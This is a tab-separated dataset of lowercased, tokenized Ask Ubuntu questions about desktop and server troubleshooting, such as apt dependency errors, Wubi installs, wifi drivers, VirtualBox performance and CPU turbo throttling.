457529	solving $ path obfuscation by /bin/sh ( dash )	this question is a follow-up from http : //unix.stackexchange.com/questions/126955/percent-in-path-environment-variable . i post it here , since it is more distro-specific . the shell used by default for sh namely dash , is not compatible with execvp because it fiddles with the $ path variable . a standardized way of dealing with strange filenames is to use url encoding scheme . now i can not use that standard because dash reserves % . to solve this i problem i have the following options recommend my users on ubuntu to change the symbolic link /bin/sh to something else like bash . it is necessary to do it globally since popen ( 3 ) relies on /bin/sh . diverge from traditional url encoding by using something other than % throw an error whenever any of the forbidden characters ( yes , windows but these restriction is sane in a dual-boot configuration ) appears . ideally i prefer option ( 1 ) seems the best way to go . it makes it possible to use a standardized escape scheme in filenames . however , since dash clearly behaves differently than some other shells , it will break the system if any of the system scripts rely on functionality unique to dash . also it requires that the user has root privileges . option ( 2 ) implies that i have to find another symbol that does not collide anywhere . certainly , some shell may screw up any symbol that is not a letter . option ( 3 ) implies too large reduction in functionality
457531	permission denied error when installing kubuntu using wubi.exe	i am first time installing kubuntu on my system . i downloaded kubuntu-13.10-desktop-amd64.iso . kept it at d drive and executed wubi.exe . i selected installation directory as e drive . at the end of kubuntu installation process , it says error `` permission denied . '' please find below stack trace . 04-29 13:17 debug tasklist : new task check_iso 04-29 13:17 debug tasklist : # # # running check_iso ... 04-29 13:17 debug commonbackend : checking e : \ubuntu\install\kubuntu-13.10-desktop-amd64.iso 04-29 13:17 debug distro : checking kubuntu iso e : \ubuntu\install\kubuntu-13.10-desktop-amd64.iso 04-29 13:17 error windowsbackend : error executing command command=c : \users\pankaj\appdata\local\temp\pylb74d.tmp\bin\7z.exe l e : \ubuntu\install\kubuntu-13.10-desktop-amd64.iso retval=2 stderr= 7-zip 9.20 copyright ( c ) 1999-2010 igor pavlov 2010-11-18 error : e : \ubuntu\install\kubuntu-13.10-desktop-amd64.iso : the process can not access the file because it is being used by another process . errors : 1 stdout= traceback ( most recent call last ) : file `` \lib\wubi\backends\win32\backend.py '' , line 519 , in get_iso_file_names file `` \lib\wubi\backends\common\utils.py '' , line 66 , in run_command exception : error executing command command=c : \users\pankaj\appdata\local\temp\pylb74d.tmp\bin\7z.exe l e : \ubuntu\install\kubuntu-13.10-desktop-amd64.iso retval=2 stderr= 7-zip 9.20 copyright ( c ) 1999-2010 igor pavlov 2010-11-18 error : e : \ubuntu\install\kubuntu-13.10-desktop-amd64.iso : the process can not access the file because it is being used by another process . errors : 1 stdout= 04-29 13:17 debug windowsbackend : command c : \users\pankaj\appdata\local\temp\pylb74d.tmp\bin\7z.exe l e : \ubuntu\install\kubuntu-13.10-desktop-amd64.iso 04-29 13:17 debug distro : does not contain casper\filesystem.squashfs 04-29 13:17 debug tasklist : # # # finished check_iso 04-29 13:17 error tasklist : [ errno 13 ] permission denied : u'e : \\ubuntu\\install\\kubuntu-13.10-desktop-amd64.iso' traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 595 , in get_iso file `` \lib\wubi\backends\common\backend.py '' , line 441 , in download_iso oserror : [ errno 13 ] permission denied : u'e : \\ubuntu\\install\\kubuntu-13.10-desktop-amd64.iso' 04-29 13:17 debug tasklist : # cancelling tasklist 04-29 13:17 debug tasklist : # finished tasklist 04-29 13:17 error root : [ errno 13 ] permission denied : u'e : \\ubuntu\\install\\kubuntu-13.10-desktop-amd64.iso' traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 595 , in get_iso file `` \lib\wubi\backends\common\backend.py '' , line 441 , in download_iso oserror : [ errno 13 ] permission denied : u'e : \\ubuntu\\install\\kubuntu-13.10-desktop-amd64.iso' i did not open any other application except the browser . is there any solution to resolve it ?
457534	ubuntu server file transfer configuration	i have a desktop computer ( ubuntu server ) and a laptop ( lubuntu desktop ) . i want to use an ethernet cable to directly connect the two and use the server to network all my storage media and serve it to my laptop via the ethernet cable . i 've seen tutorials on how to connect two computers by creating an ip for them in nm-applet . my question is how to do this via the command line on ubuntu server ? also , i do n't want a lot of overhead . i do n't see the need to use ssh when there is no internet connection . thank you .
457535	blackgold 3620 get working in ubuntu	i 've bought a duel pci-e freeview blackgold tv tuner in the past , and have been unable to get it working under linux . they have released the source code but how do i get this integrated into the ubuntu 14.04 kernel ? 03:00.0 multimedia controller : philips semiconductors saa7231 ( rev aa )
457537	indicators menu missing in ubuntu 14.04	recently i have upgraded gedit to 3.12 ( gnome 3.12 , only gedit ) , my indicators menus are gone . i can see the indicator but no menu how do i fix it ? indicators show menu nothing updated bluetooth , mail , battery and date menu not appearing skype , network manager and other indicator menu does appear .
457538	where to get instrument sounds for for ubuntu music software ?	soundfonts midi or other to play with midi keuboard on ubuntu ? any body know softfonts or software synth or sequencer to play ubuntu ?
457539	`` package : amd64 can not be configured because package : i386 is in a different version ''	i have tried so many things , that i have no idea how to resolve this . i want to update my packages on my server . for that i do the following : sudo apt-get update sudo apt-get upgrade i then get the following response : peter @ blackbox : /etc/apt $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libavahi-common-data : breaks : libavahi-common-data : i386 ( ! = 0.6.30-5ubuntu2 ) but 0.6.30-5ubuntu2.1 is installed libavahi-common-data : i386 : breaks : libavahi-common-data ( ! = 0.6.30-5ubuntu2.1 ) but 0.6.30-5ubuntu2 is installed e : unmet dependencies . try using -f. following the instructions : peter @ blackbox : /etc/apt $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libcommons-jxpath-java libplexus-archiver-java libmaven-plugin-tools-java libcdi-api-java libplexus-containers-java linux-headers-3.2.0-44-generic linux-headers-3.2.0-39-generic libwagon-java libmodello-java linux-image-3.2.0-55-generic libsisu-guice-java libplexus-classworlds-java libmaven2-core-java libjtidy-java linux-image-3.2.0-37-generic linux-headers-3.2.0-52-generic libhttpclient-java libaspectj-java libservlet2.4-java libplexus-velocity-java linux-headers-3.2.0-32 linux-headers-3.2.0-33 linux-headers-3.2.0-40 linux-headers-3.2.0-35 linux-headers-3.2.0-36 linux-headers-3.2.0-37 linux-headers-3.2.0-43 linux-headers-3.2.0-38 linux-headers-3.2.0-44 linux-headers-3.2.0-39 linux-headers-3.2.0-45 linux-headers-3.2.0-51 linux-headers-3.2.0-52 linux-headers-3.2.0-53 linux-headers-3.2.0-48 linux-headers-3.2.0-55 libcommons-jexl-java linux-headers-3.2.0-56 libosgi-compendium-java libplexus-cipher-java libguava-java libplexus-classworlds2-java libplexus-build-api-java libplexus-i18n-java linux-image-3.2.0-45-generic libnetty-java linux-headers-3.2.0-55-generic libplexus-interactivity-api-java libqdox-java libgeronimo-jpa-2.0-spec-java linux-headers-3.2.0-37-generic libcglib-java linux-image-3.2.0-53-generic linux-image-3.2.0-48-generic libxbean-java libcommons-net2-java libsaxon-java libdoxia-sitetools-java glassfish-javaee libitext1-java linux-image-3.2.0-40-generic libcommons-collections-java linux-headers-3.2.0-45-generic linux-image-3.2.0-56-generic libosgi-foundation-ee-java libasync-http-client-java libplexus-ant-factory-java libplexus-cli-java libplexus-container-default-java aspectj linux-headers-3.2.0-32-generic libeasymock-java linux-image-3.2.0-43-generic linux-image-3.2.0-38-generic linux-headers-3.2.0-53-generic linux-headers-3.2.0-48-generic fop libaopalliance-java libgeronimo-interceptor-3.0-spec-java libplexus-io-java libplexus-bsh-factory-java libclassworlds-java libplexus-interpolation-java libosgi-core-java linux-headers-3.2.0-40-generic linux-headers-3.2.0-35-generic linux-image-3.2.0-51-generic linux-headers-3.2.0-56-generic libhttpcore-java libcommons-httpclient-java libplexus-containers1.5-java libcommons-vfs-java linux-headers-3.2.0-43-generic linux-headers-3.2.0-38-generic libslf4j-java libasm3-java libjsoup-java libfop-java libaether-java libatinject-jsr330-api-java libsisu-ioc-java libcommons-configuration-java libmaven-reporting-impl-java velocity libxmlgraphics-commons-java linux-headers-3.2.0-51-generic libwerken.xpath-java libgeronimo-osgi-support-java libnetbeans-cvsclient-java libplexus-utils-java linux-headers-3.2.0-33-generic libplexus-sec-dispatcher-java libcommons-validator-java linux-image-3.2.0-44-generic linux-image-3.2.0-39-generic libmaven-scm-java libdoxia-java libcommons-digester-java libbatik-java libjetty-java libcommons-io-java libplexus-utils2-java linux-headers-3.2.0-36-generic libganymed-ssh2-java linux-image-3.2.0-52-generic use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libavahi-common-data the following packages will be upgraded : libavahi-common-data 1 upgraded , 0 newly installed , 0 to remove and 68 not upgraded . 8 not fully installed or removed . need to get 0 b/21.4 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : error processing libavahi-common-data ( -- configure ) : libavahi-common-data : amd64 0.6.30-5ubuntu2 can not be configured because libavahi-common-data : i386 is in a different version ( 0.6.30-5ubuntu2.1 ) dpkg : error processing libavahi-common-data : i386 ( -- configure ) : libavahi-common-data : i386 0.6.30-5ubuntu2.1 can not be configured because libavahi-common-data : amd64 is in a different version ( 0.6.30-5ubuntu2 ) dpkg : dependency problems prevent configuration of libavahi-common3 : i386 : libavahi-common3 : i386 depends on libavahi-common-data ; however : package libavahi-common-data : i386 is not configured yet . dpkg : error processing libavahi-common3 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libavahi-common3 : libavahi-common3 depends on libavahi-common-data ; however : package libavahi-common-data is not configured yet . dpkg : error processing libavahi-common3 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libavahi-client3 : libavahi-client3 depends on libavahi-common3 ( > = 0.6.22 ) ; however : package libavahi-common3 is not configured yet . dpkg : error processing libavahi-client3 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libavahi-client3 : i386 : libavahi-client3 : i386 depends on libavahi-common3 ( > = 0.6.22 ) ; no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already no apport report written because maxreports is reached already however : package libavahi-common3 : i386 is not configured yet . dpkg : error processing libavahi-client3 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libavahi-core7 : libavahi-core7 depends on libavahi-common3 ( > = 0.6.16 ) ; however : package libavahi-common3 is not configured yet . dpkg : error processing libavahi-core7 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of avahi-daemon : avahi-daemon depends on libavahi-common3 ( > = 0.6.16 ) ; however : package libavahi-common3 is not configured yet . avahi-daemon depends on libavahi-core7 ( > = 0.6.24 ) ; however : package libavahi-core7 is not configured yet . dpkg : error processing avahi-daemon ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libavahi-common-data libavahi-common-data : i386 libavahi-common3 : i386 libavahi-common3 libavahi-client3 libavahi-client3 : i386 libavahi-core7 avahi-daemon e : sub-process /usr/bin/dpkg returned an error code ( 1 ) anyone has any idea how to resolve this ? update 30-04-2014 : as avinash raj suggested i have hold back the libavahi-common-data and run his commands . i get the following : peter @ blackbox : ~ $ sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libavahi-common-data : breaks : libavahi-common-data : i386 ( ! = 0.6.30-5ubuntu2 ) but 0.6.30-5ubuntu2.1 is installed libavahi-common-data : i386 : breaks : libavahi-common-data ( ! = 0.6.30-5ubuntu2.1 ) but 0.6.30-5ubuntu2 is installed e : unmet dependencies . try using -f. peter @ blackbox : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... failed . the following packages have unmet dependencies : libavahi-common-data : breaks : libavahi-common-data : i386 ( ! = 0.6.30-5ubuntu2 ) but 0.6.30-5ubuntu2.1 is installed libavahi-common-data : i386 : breaks : libavahi-common-data ( ! = 0.6.30-5ubuntu2.1 ) but 0.6.30-5ubuntu2 is installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies
457541	unable to type anything on chromium	i have the latest 14.4 lubuntu ( spanish ) version already updated . i have found the same bug in two machines . the machines are a 11 year old p4 2.5ghz , geforce mx 420 and a 9 year old dell laptop pentium cetrino 1.7 ghz . i can focus the cursor on any dialog appearing in chromium : url bar , gmail dialogs , composing messages in gmail etc , but i am not able to type anything on them . when i type nothing happens . is this a known bug in the latest chromium version ? anything else is correct . i can browse normally and websites are rendered correctly . i have tried to resinstall chromium in the two machines and i have deleted the chromium profile dir but i still unable to type anything , even with a new profile . firefox runs flawlessly and any other things in the pcs are ok .
457545	finding problems in installing opencv	err http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main dpkg-dev all 1.16.1.2ubuntu7.2 404 not found [ ip : 91.189.91.14 80 ] please tell me how to sort out this problem
457547	ubuntu upgrade rescue meet the udev problem , help	thank adevance , please help me out ! i upgrade from 13.10 to 14.04 , but there is problems occured , so i rescued through knoppix livecd . just now the problem is : when i tried in chroot enviroment : code : dpkg -- configure -a the result is : code : setting up whoopsie ( 0.2.24.5 ) ... invoke-rc.d : unknown initscript , /etc/init.d/whoopsie not found . dpkg : error processing package whoopsie ( -- configure ) : subprocess installed post-installation script returned error exit status 100 setting up lirc ( 0.9.0-0ubuntu5 ) ... * udev requires devtmpfs support , not started ... fail ! invoke-rc.d : initscript udev , action `` reload '' failed . dpkg : error processing package lirc ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up udev ( 204-5ubuntu20 ) ... * udev requires devtmpfs support , not started ... fail ! invoke-rc.d : initscript udev , action `` restart '' failed . dpkg : error processing package udev ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of ubuntu-minimal : ubuntu-minimal depends on udev ; however : package udev is not configured yet . and the apt-get upgrade and dist-upgrade get same result !
457552	after installation of 14.04 finished up with some unwanted items .	after installation of 14.04 finished up with some unwanted icons on the upper horizontal task bar , left to the other wifi , startup , etc . settings icons . one is the familiar `` penguin '' icon and another one is shaped somewhat like a shell . clicking on each one brings down a menu with chinese characters , which is strange as i do not have the chinese language installed ; i only selected `` english ( us ) '' . in addition i have a trash bin icon on my desktop as well as on the vertical icon bar at the left of the screen . how do i remove the desktop trash bin and the unwanted icons with the chinese characters ? i am no expert , but can use the command line , so please keep it simple . thanks , paul .
457553	how do i install autodock ?	i 've just downloaded the tarball ( i.e . .tar.gz format ) for autodock and extracted the contents into the directory /home/fusion809/downloads/i86linux2 which now consists of two x-executable files autodock4 and autogrid4 . my problem is i do n't know what to do with them as i 've tried running them by using the terminal to change directories into the folder i extracted and tried to it run the problem with the command : ./autodock4 . i suspect that this might be a program i need to run from the terminal . is this true ?
457555	nvidia driver in edubuntu 14.04 lts	few days ago i 've been installed the new edubuntu 14.04 lts distro and since than i 'm trying to update the video driver becouse somtimes the monitor is blinking . it seems like the driver that is appearing to be installed `` nvidia-304 `` is n't the good one . i was trying to get the proper driver on nvidia site by ''auto detect ... '' part , but even after i 've installed the recuested java it does n't work . can anyone please help me with some info to solve the problem ? thanks
457557	virtual machine running painfully slow	i am running ubuntu 14.04 , and i 've installed windows 8 on virtualbox . the problem is that it is too slow - even minimizing a windows takes 2-3 seconds . the reason i think this is a problem is because i have a fairly strong machine here : my cpu is i5-3470 , and i have 8 gigabytes of ddr3 running on intel ssd with sata3 . checking the hardware monitor while running the vm shows that i only use 4 gigabytes and cpu usage is around 5 % idle . here 's what i think : i have an on board graphics card that ca n't run all of windows ' eye candy fast enough . also , in virtualbox preferences i ca n't check 2d/3d acceleration , as i get a message about invalid configurations . am i right ? and if not , any suggestions ? thanks !
457558	booting ubuntu server 12.04 in virtualbox fails- freezes after grub menu	i have virtualbox 4.1.12_ubuntur77245 and i have imported 2 ova files : ubunutu 12.04 server and ubunutu 14.04 server . when i start the ubuntu vms they both freeze after selecting what i want to load at the grub menu . i am fine importing tinycore linix into virtualbox 4.1.12_ubuntur77245 . i have also suucessfuly imported the above ubuntu ova files into the latest virtualbox 4.3.10 and another virtualbox 4.1.12_ubuntur77245 . ive tried disabling various settings such vt support but nothing i try will allow me to stop the freezing . i have http : //paste.ubuntu.com/7358163/ vm log in the hope somebody can see an issue . it does say near the bottom of the log that vrdp has been disabled . could that be the problem ? thanks for the help , dan
457560	use ssh to connect with pc in local network	i want to access the pc 's connected in local network . i have installed the nmap . i want to connect with other pc using ssh . can anyone help me regarding this ? ?
457563	is ubuntu missing the shared wifi connection that kubuntu comes preinstalled with ?	i just started using linux a couple of months ago . i started with lubuntu and later switched to kubuntu , which seemed nice and all except for its constant slowness . but on kubuntu , i was able to share internet to my android phone by opening the network connections , selecting new , then selecting wifi ( shared ) [ which does n't seem to be available on ubuntu 14.04 . ubuntu 14 only provides me with wifi.and when i go ahead and create an adhoc connection , my android device is unable to detect it due to a restriction in the android wpa_supplicant file . i have tried many solutions here on ask but non seems to work out . as i have already said , on kubuntu all i had to do was select wifi ( shared ) option and input my password and its being detected by my android phone . my laptops internal wifi chip ( pro/wireless 3945abg ) never worked on kubuntu . so i used to use my usb wifi dongle ( zydas zd1211 ) and it worked perfectly . so could it be that the drivers kubuntu was using for the usb dongle supported shared connection but that of ubuntu does n't ? any ideas ?
457566	i can not seup my new printer canon pixma mg2550	i can not setup my printer although i tried all possibles solutions , the cd for windows setup , online checking for drivers and select printer from database . in the data base there is only 2100 series and 3100 series which if you apply the drivers it does n't work . this printer works perfect in windows in the same computer . thanks
457568	installed ubuntu on hdd , how to move it partially onto ssd	i have recently installed ubuntu 14.04 entirely on the hdd of my dell inspiron 14z which has 500gb hdd + 32 gb ssd . i have 24gb of ssd lying unused and i would like to allocate about 18gb of the ssd to ubuntu . please tell me what is an efficient method for doing it and what specific directories ( such as home , tmp or boot ) can i move onto the ssd and what can be kept on hdd .
457576	how to go back to my old setup	i am new to ubuntu . just now i recovered my ubuntu 12.04 laptop . all files are there and all application are there at /opt folder . but i dont know how to run those applications . sound drivers are also not working . please tell me how to get back to my system as before .
457579	how do i set default programs ?	i know how to set default web , mail , calendar , music , video and photo-viewing software ( by opening system settings ) but i 'd like to be able to set my default pdf viewer .
457580	problems with ubuntu 14.04 unity desktop after upgrade	i have been facing multiple problems after upgrading to ubuntu 14.04 . all the problems are related to the desktop interface . after upgradation , i have been unable to change my wallpaper . firstly wallch ( a program which automatically changes wallpapers ) started becoming unresponsive . i used it to set a wallpaper but due to its unresponsiveness , i uninstalled it . then i tried changing the wallpaper from the `` appreance settings '' but was unsuccessful . i also tried the `` set as wallpaper '' option which we get when we right-click an image file ( lets call it imga ) but was still unsuccessful . i then checked the value of the desktop-background in dconf-editor and it was showing the value path to imga file but the background which is displayed is a completely different image . i also tried re-installing unity and nautilus packages from synaptic but still the problem persists . another issue i started facing was when minimizing windows , from the window bar , unity hangs when i minimize the last of all the opened windows and only responds when i press 'alt' i recently installed playonlinux and played a couple of games in the full screen mode . when i exit from any game , the desktop backrgound goes all black and i have to logout and login again to restore the background . i am assuming that the above 3 problems are connected somehow . i am using a dell laptop with intel graphics card . let me know if further information is required from my side . -- edit -- as suggested in the comment below , i opened the unity-control-center from the terminal . here 's the ouput : ( unity-control-center:15831 ) : gtk-critical ** : gtk_radio_button_set_group : assertion ' ! g_slist_find ( group , radio_button ) ' failed ( unity-control-center:15831 ) : gtk-critical ** : gtk_radio_button_set_group : assertion ' ! g_slist_find ( group , radio_button ) ' failed ( unity-control-center:15831 ) : gtk-critical ** : gtk_radio_button_set_group : assertion ' ! g_slist_find ( group , radio_button ) ' failed ( unity-control-center:15831 ) : unity-control-center-warning ** : could not load /usr/share/themes/highcontrast/index.theme : no such file or directory ( unity-control-center:15831 ) : glib-gobject-critical ** : g_object_unref : assertion 'g_is_object ( object ) ' failed *** bug *** in pixman_region32_init_rect : invalid rectangle passed set a breakpoint on '_pixman_log_error ' to debug ( unity-control-center:15831 ) : unity-control-center-warning ** : failed to load picture '/home/user1/pictures/big_4c5beb001d9090853e1bf9af24147e63de79edf0.jpg ' : error opening file : too many open files ( unity-control-center:15831 ) : unity-control-center-warning ** : failed to load picture '/home/user1/pictures/big_4d1a4510071da06bfe2351d0a59c54271c7bda3a.png ' : error opening file : too many open files ( unity-control-center:15831 ) : unity-control-center-warning ** : failed to load picture '/home/user1/pictures/big_04b22aa796b650c7364bd84da515d8b527f5dcbd.png ' : error opening file : too many open files ( unity-control-center:15831 ) : unity-control-center-warning ** : failed to load picture '/home/user1/pictures/big_4aac96caa049ac3e5a62a90c78f21945b1b27ce6.jpg ' : error opening file : too many open files ... . many of these output messages and then when i closed it .. i got the following two lines ( unity-control-center:15831 ) : gtk-critical ** : gtk_builder_get_object : assertion 'gtk_is_builder ( builder ) ' failed ( unity-control-center:15831 ) : gtk-critical ** : gtk_icon_view_get_selected_items : assertion 'gtk_is_icon_view ( icon_view ) ' failed
457582	accidently deleted my /etc/default folder	i accidently deleted my /etc/default folder . now my computer wont boot . its running ubuntu 14.04 lts . upon boot it says , filesystem check or mount failed . a maintenance shell will now be started.control-d will terminate this shell and continue booting after re-trying filesystems . any further errors will be ignored . please help , this is a very important computer and can not suffer any downtime .
457583	what does super + e do ?	if the desktop has focus and i press super and then e , a little text box appears at the bottom right hand corner of the screen . what is it supposed to do ?
457587	ca n't get ubuntu to install in windows 8	i saw ubuntu today on my friend 's laptop , and i immediately fell in love . i then decided to try installing ubuntu reading the guide on the official ubuntu website ( which included downloading an .iso image and setting it up for booting from my usb drive ) . after attempting for five hours , i have still not been able to install ubuntu . i use an hp envy m6 with an existing installation of windows 8 . things i have tried : disabling secure boot in the bios disabling fast booting in windows 8 changing the boot order in the bios so that the usb boots first ( causing a bsod , which i eventally solved ) using the unetbootin tool to create my bootable usb ( from the .iso image i downloaded earlier ) this has really been frustrating . i had thought the whole process would be as easy i read on the official ubuntu website .
457589	tomcat6 manager installation error	i am new to linux .i am trying to install tomcat6 .i installed it successfully but for manager webapp html gui i have changes my tomcat-users.xml file as /etc/tomcat6/tomcat-users.xml < tomcat-users > < role rolename= '' manager-gui '' / > < role rolename= '' admin-gui '' / > < user username= '' root '' password= '' admin '' roles= '' manager-gui , admin-gui `` / > < /tomcat-users > saved it using sudo nano command ( as root login ) when i try to use tomcat manager it shows me login dialog box but login is unsuccessful shows me 401 unauthorized page why there is no authorization to execute this ? i have start stop and restarted my tomcat whenever needed
457594	how do i download a folder in ftp mode from the terminal ?	using the get command from the terminal in ftp mode , i can download a single file . which command should i use in order to download a complete folder containing many files in ftp mode ?
457595	no unity bar , no window bar on saucy and trusty	after i upgraded from raring , i started not seeing bars of unity and also on all windows . some phenomenon : ctrl + alt + t not opening terminal happens only with my main user account ie . when logging in with guest account things look normal . log in display also looks normal . wallpapers on bacgground are displayed . only possible way to operate on terminal is from ssh -x , but : ( logged into 192.168.1.15 ) $ export display=192.168.1.15:0.0 $ unity & [ 2 ] 5155 nwind @ wind-t440s : ~ $ stop : unknown job : unity-panel-service start : unknown job : unity-panel-service compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core compiz ( core ) - fatal : could n't open display 192.168.1.15:0.0 compiz ( core ) - info : stopping plugin : core compiz ( core ) - info : unloading plugin : core $ w 19:32:39 up 1:02 , 2 users , load average : 2.00 , 2.01 , 2.05 user tty from login @ idle jcpu pcpu what nwind :0 :0 18:32 ? xdm ? 3:56 0.13s init -- user nwind pts/1 wind-serval.loca 18:52 7.00s 0.21s 0.00s w i was at a loss and upgraded to trusty ( that was original purpose anyway ) but things remain the same . what 's wrong ? thank you .
457596	vlc does n't run well in ubuntu 14.04	i recently upgrade my os to ubuntu 14.04 , after successfully upgrading , i have some problems with vlc . sometimes the volume is muted and when i forward or go back to media file then the sound is working . the second problem is that sometimes it shuts down immediately without reporting any crash or bug .
457597	cpu turbo boost : modify temperature limit under 14.04	i 've installed kubuntu 14.04 , and there is some problem with cpu turbo frequency . i 've read a lot about it , but ca n't find the correct answer . there is an i7-3630qm cpu @ 2.40ghz with 3.20ghz turbo in my lenovo y580 notebook . if i put the cpu at full load ( with rendering in blender on 8 threads ) the frequency jumps to around 3.2ghz for all cores , but after a few seconds , when the temperature rises , the frequency decreases to 2.4ghz , and stay on it during the rendering , ( the fan does not run at max speed ) . when i used ubuntu 12.10 this problem not occured , but it does in 13.10 and 14.04 . my notebooks cooler is really good , so there is no toverheating problem with the full speed turbo boost ( the cpu temp was 85-90째c at 3.2ghz in ubuntu 12.10 ) , so i want to use it on full speed . how can i use the cpu with turbo boost at full 3.2ghz speed in ubuntu 14.04 without this ( temperature ? ) limit ? ( after discuss with terdon ) i think the problem is that cpu freq is scaled down before the fan could respond to the high temperature . after cpu scaled back from 3.2ghz to 2.4ghz the fan spins up for a moment , but because cpufreq already scaled down , it generates less heat , so the fan 's rpm falls back . it would be ok , if after cpu cooling down , frequency rise again to 3.2ghz , but it stays on 2.4ghz . some measurements : output of i7z program , when the render just started : cpu speed from cpuinfo 2394.00mhz cpuinfo might be wrong if cpufreq is enabled . to guess correctly try estimating via tsc linux 's inbuilt cpu_khz code emulated now true frequency ( without accounting turbo ) 2394 mhz cpu multiplier 24x || bus clock frequency ( bclk ) 99.75 mhz socket [ 0 ] - [ physical cores=4 , logical cores=8 , max online cores ever=4 ] turbo enabled on 4 cores , hyper threading on max frequency without considering turbo 2493.75 mhz ( 99.75 x [ 25 ] ) max turbo multiplier ( if enabled ) with 1/2/3/4 cores is 34x/33x/32x/32x real current frequency 3192.01 mhz [ 99.75 x 32.00 ] ( max of below ) core [ core-id ] : actual freq ( mult . ) c0 % halt ( c1 ) % c3 % c6 % c7 % temp core 1 [ 0 ] : 3191.98 ( 32.00x ) 100 0 0 0 0 83 core 2 [ 2 ] : 3192.01 ( 32.00x ) 99.8 0 0 0 1 92 core 3 [ 4 ] : 3192.00 ( 32.00x ) 100 0 0 0 0 88 core 4 [ 6 ] : 3192.00 ( 32.00x ) 100 0 0 0 0 76 ... and 5-10 seconds later ( also with full load ) : cpu speed from cpuinfo 2394.00mhz cpuinfo might be wrong if cpufreq is enabled . to guess correctly try estimating via tsc linux 's inbuilt cpu_khz code emulated now true frequency ( without accounting turbo ) 2394 mhz cpu multiplier 24x || bus clock frequency ( bclk ) 99.75 mhz socket [ 0 ] - [ physical cores=4 , logical cores=8 , max online cores ever=4 ] turbo enabled on 4 cores , hyper threading on max frequency without considering turbo 2493.75 mhz ( 99.75 x [ 25 ] ) max turbo multiplier ( if enabled ) with 1/2/3/4 cores is 34x/33x/32x/32x real current frequency 2462.52 mhz [ 99.75 x 24.69 ] ( max of below ) core [ core-id ] : actual freq ( mult . ) c0 % halt ( c1 ) % c3 % c6 % c7 % temp core 1 [ 0 ] : 2394.01 ( 24.00x ) 100 0 0 0 0 65 core 2 [ 2 ] : 2394.00 ( 24.00x ) 100 0 0 0 0 74 core 3 [ 4 ] : 2462.43 ( 24.69x ) 100 0 0 0 0 71 core 4 [ 6 ] : 2462.52 ( 24.69x ) 99.9 0 0 0 0 61 ... thanks in advance for the answers .
457599	internet ( both wifi and lan ) stop working after some time	i have installed ubuntu 12.04 on dell n4050 . but there is a problem with my internet . it first works fine . but after sometime about 3 to 4 min , it stop working . i tried to ping with server , default gateway and google , it ping with dns but does n't ping with the other 2 . if i disconnect from wifi or lan and connect again , it start working without any problem , but after sometime , same thing happen . before this , i installed 14.04 , but there were some problem . i have windows 8 in parallel and the internet is working fine on it . i have following network controller : mhassan @ mhassan : ~ $ lspci -nn | grep 0280 09:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) and some time , packet misses when i ping - like 4 sent but 3 recieved . can any body help me to solve this problem ?
457604	converting a lot of image jpg to png	i want to convert a lot of image ( nearly 100 ) from jpg to png format . how can i do this without renaming them ?
457608	bcm4313 wireless adapter on 14.04	i realize that there is a lot of talk about wireless drivers , as well as a lot of suggested solutions . i believe i have tried a lot of them and am now with a new install open to new suggestions . broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) does not react to any of the drivers explained in this very detailed and otherwise useful question . it has been suggested that for a 14e4:4727 it should n't be necessary to install any drivers as they are `` installed by default in the package linux-firmware '' . as this did not work i latter tried with drivers suggested by `` additional drivers '' with same lack of result . as of course with the rest of the mentioned drivers . i did not use several drivers at the same time . i should also say thatrfkill listdoes not show anything blocked and the wireless adapter is on . any suggestions ?
457615	unable to install microsoft true type core fonts on ubuntu 14.04	after updating to ubuntu 14.04 , i installed ubuntu restricted extras and then the software center crashed during the installation so i had to terminate the window . i removed and re-installed it and found that the ms fonts are not installed in my os . once in a while i 'd get the bellow message ( i 've tried to re-install the ms true type core font package a few times but i still can not see the fonts ) : data files for some packages could not be downloaded the following packages requested additional data downloads after package installation , but the data could not be downloaded or could not be processed . ttf-mscorefonts-installer this is a permanent failure that leaves these packages unusable on your system . you may need to fix your internet connection , then remove and reinstall the packages to fix this problem .
